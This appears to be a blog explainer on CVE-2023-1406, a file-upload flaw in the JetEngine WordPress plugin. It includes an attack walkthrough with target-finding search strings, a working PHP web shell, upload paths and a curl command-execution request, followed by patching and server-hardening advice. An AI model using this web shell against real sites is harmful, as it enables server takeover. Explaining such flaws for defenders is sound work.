If you run a WordPress site with advanced dynamic content, chances are good you’ve heard of JetEngine. It’s a popular plugin from Crocoblock used for custom post types, listings, and forms. But in March 2023, a serious vulnerability (CVE-2023-1406) was discovered: JetEngine versions before 3.1.3.1 would let attackers upload *any* file — including dangerous scripts that can take over your website.
In this long read, we’ll explain what went wrong, walk you step-by-step through exploit details, and share how to keep your site safe. *This article is written in simple language for WordPress admins, developers, and security enthusiasts.*
What is CVE-2023-1406?
CVE-2023-1406 is a “remote code execution” (RCE) vulnerability in JetEngine plugin (versions < 3.1.3.1). The plugin did not properly check user-uploaded files. This means a hacker could upload a file — like a PHP shell disguised as an image — and then execute arbitrary code on your server.
How serious is it? Remote code execution flaws are among the worst: They can lead to total site takeover, malware deployment, or getting your site blacklisted.
Official References & Details
- NVD entry: CVE-2023-1406
- WPScan entry
- Plugin changelog
- Crocoblock JetEngine downloads
It failed to validate what was being uploaded (by extension, MIME type, or actual file content).
- So, an attacker could upload a file like malicious.php — or even evil.jpg that was really PHP — to a writable folder on your server.
By visiting the uploaded file’s URL, the attacker could run commands as your server user.
In plain English: If your JetEngine form took uploads from anyone, it could have been abused to plant a backdoor.
Exploit Walkthrough: How Attackers Gain Access
Let's see just how easy it was. *This example is for educational purposes only! Only test on your own systems or in a lab.*
Attackers search Google or use tools like WPScan to find candidate sites
inurl:/jet-engine/
or
inurl:/wp-content/uploads/jet-engine-forms/
Here's a classic web shell, saved as shell.php
<?php
if(isset($_REQUEST['cmd'])){
echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';
}
?>
3. Upload the shell
Using the vulnerable JetEngine form, the attacker selects shell.php to upload. Sometimes they may rename it to shell.jpg — if the plugin only checks extensions, but not the MIME type or file content, it still works.
Most times, uploads go to something like
/wp-content/uploads/jet-engine-forms/2023/03/shell.php
The attacker visits
https://victimsite.com/wp-content/uploads/jet-engine-forms/2023/03/shell.php?cmd=whoami
And gets back the output of the whoami command — proving code execution!
Screen Example
$ curl 'https://victimsite.com/wp-content/uploads/jet-engine-forms/2023/03/shell.php?cmd=id';
uid=1001(www-data) gid=1001(www-data) groups=1001(www-data)
*Congratulations — the attacker now has full control over your site!*
Why Did This Happen?
Root cause: The JetEngine plugin wasn’t verifying if an uploaded file might be executed by the server.
Blocking double extensions (e.g., .jpg.php)
If you use this plugin, you must update to 3.1.3.1 or later!
Update JetEngine: Go to Plugins → Update JetEngine immediately.
2. Review uploads: Check /wp-content/uploads/jet-engine-forms/ for suspicious files.
3. Disable file uploads temporarily: In JetEngine → Forms settings, uncheck file upload fields or use plugin like Disable Uploads.
4. Scan your site with Wordfence or Sucuri.
5. Harden permissions: Make sure that uploaded files directories don’t execute PHP scripts (see bonus tip below).
To block similar RCE attacks even as a backup, add this .htaccess to your uploads folder
# Block PHP execution in uploads
<FilesMatch "\.php$">
Deny from all
</FilesMatch>
Or, if you use NGINX
location ~* /uploads/.*\.php$ {
deny all;
}
Conclusion
CVE-2023-1406 is a textbook case of why file upload forms are dangerous if not properly secured. Attackers can and will probe for outdated plugins — and one missed patch can lead to a full site compromise.
Further Reading
- CVE-2023-1406 on NVD
- JetEngine Plugin Official Site
- WordPress Plugin Security FAQ
Timeline
Published on: 04/10/2023 14:15:00 UTC
Last modified on: 04/24/2023 13:15:00 UTC